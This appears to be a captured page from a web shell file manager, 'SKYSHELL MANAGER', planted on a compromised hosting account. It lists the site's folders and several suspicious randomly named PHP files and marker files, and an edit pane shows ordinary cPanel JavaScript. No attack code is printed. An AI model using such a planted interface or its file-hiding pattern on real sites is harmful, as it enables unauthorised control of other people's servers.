📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: pageIdentifierService.js
/* * cjt2/services/pageIdentifierService.js Copyright 2022 cPanel, L.L.C. * All rights reserved. * copyright@cpanel.net http://cpanel.net * This code is subject to the cPanel license. Unauthorized copying is prohibited */ /** * Service that generates a page specific identifer for use by other services * * @module cjt/services/pageIdentifer * */ define( [ "angular", "cjt/core", "cjt/util/locale", ], function(angular, CJT, LOCALE) { "use strict"; // Retrieve the current application var module = angular.module("cjt2.services.pageIdentiferService", []); module.factory("pageIdentifierService", [ "$document", function($document) { return { /** * Generated page identifier. * * @name _pageIdentifier * @type {?String} * @private */ _pageIdentifier: null, /** * jqLite wrapped dom element. * * @external jqLiteObject * @see {@link https://docs.angularjs.org/api/ng/function/angular.element|jqLiteObject} */ /** * Get the jqlite wrapped document object. * * @method _getDocument * @return {jqLiteObject} Document wrapped in a jqList wrapper. */ _getDocument: function _getDocument() { return $document; }, /** * Get the document id from the markup. * * @method _getDocumentId * @return {String} The unique id for the body element of the page. */ _getDocumentId: function _getDocumentId() { return this._getDocument().find("body").attr("id"); }, /** * Builds the page identifier to be used for saving components * * @method _buildPageIdentifier * @private * @return {Boolean|String} Returns a boolean value of false if it fails, * otherwise it returns the identifier generated. * */ _buildPageIdentifier: function _buildPageIdentifier() { if (this._pageIdentifier) { return this._pageIdentifier; } if (!CJT.applicationName) { throw new Error(LOCALE.maketext("The system could not generate a page identifier with the [asis,pageIdentiferService]. It also could not determine the “[asis,(cjt/core).applicationName]” for the running application.")); } var bodyId = this._getDocumentId(); if (!bodyId) { throw new Error(LOCALE.maketext("The system could not generate a page identifier with the [asis,pageIdentiferService]. You must specify the [asis,body.id].")); } if (CJT.applicationName && bodyId) { this._pageIdentifier = "CSSS_" + CJT.applicationName + "_" + bodyId; } return this._pageIdentifier; }, /** * Get the page identifier for the current page. * * @method getPageIdentifier * @return {String|Boolean} Returns the identifier or false if it can not be generated * for the page. */ getPageIdentifier: function getPageIdentifier() { if (this._pageIdentifier) { return this._pageIdentifier; } return this._buildPageIdentifier(); } }; } ]); } );
Save